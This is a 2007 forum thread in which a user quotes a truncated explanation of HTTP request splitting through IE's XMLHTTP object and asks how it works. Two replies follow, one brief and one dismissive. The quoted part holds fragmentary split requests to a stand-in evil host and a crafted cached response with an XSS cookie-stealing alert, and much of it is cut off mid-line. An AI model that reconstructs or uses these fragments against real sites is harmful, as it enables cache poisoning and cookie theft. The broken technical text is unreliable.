Results 1 to 3 of 3
Thread: HTTP Request splitting
Dec 11, 2007, 12:16 #1
- Join Date
- Feb 2005
- Beyond the seas there is a town
- 0 Post(s)
- 0 Thread(s)
HTTP Request splitting
A Request Splitting attack abuses flaws in
asyncronous requests and allows to inject arbitrary
headers when an Http request is built. The attack in
the following examples is accomplished using IE's
ActiveX object 'Microsoft.XMLHTTP', but there are
unfixed objects in other browsers that permit it too.
Let's make an example:
var x = new ActiveXObject("Microsoft.XMLHTTP");
will send the following requests:
GET http://www.evil.site/2.html HTTP/1.1
GET /3.html HTTP/1.1
If there is a web proxy in the middle of the
communication, it will see two requests asking for
two pages at http://www.evil.com. As it explained in
figure 3, the proxy will send the two requests and
will get two response:
Response 1: http://www.evil.site/2.html:
<html> <body> foo </body> </html>
Response 1_2: http://www.evil.site/3.html:
<html> <head> <meta http-equiv="Expires"
content="Wed, 01 Jan 2020 00:00:00 GMT">
<meta http-equiv="Cache-Control" content="public">
<meta http-equiv="Last-Modified" content="Fri, 01 Jan 2010
alert("DEFACEMENT and XSS: your cookie
from browser's point of view, only request 1 has been
sent, so Response 1_2 is simply put into browser
queue waiting to be associated to the next request.
with any host address (e.g. http://www.bank.com)
and the browser will queue Response 1_2 instead of
the original page.
Auto Injecting Cross Domain Scripting
It will be presented a new attack technique which
takes advantage of HTTP request-splitting or request
smuggling vulnerabilities and frame injection vectors.
As a result of this attack a malicious user could
page of any domain to take control over user's
I don't get howe this attack work,May someone explain that?Response 1_2 is simply put into browser
queue waiting to be associated to the next request,But how a hacker uses that?I shall build a boat,I shall cast it in the water,
I shall sail away from this strange earth,
Where no one awaken the heroes in the wood of love
Dec 11, 2007, 15:00 #2
- Join Date
- Jan 2007
- Christchurch, New Zealand
- 104 Post(s)
- 4 Thread(s)
The attack works by forcing two pages to come through instead of just the one.
When a new window is opened, you will see not what is supposed to be there, but instead the second page from the bad site.
Dec 11, 2007, 15:17 #3
Alright I don't mean to come off mean or rude, but you seriously need to stop and learn the basics. You are way over your head way over.Logic without the fatal effects.
All code snippets are licensed under WTFPL.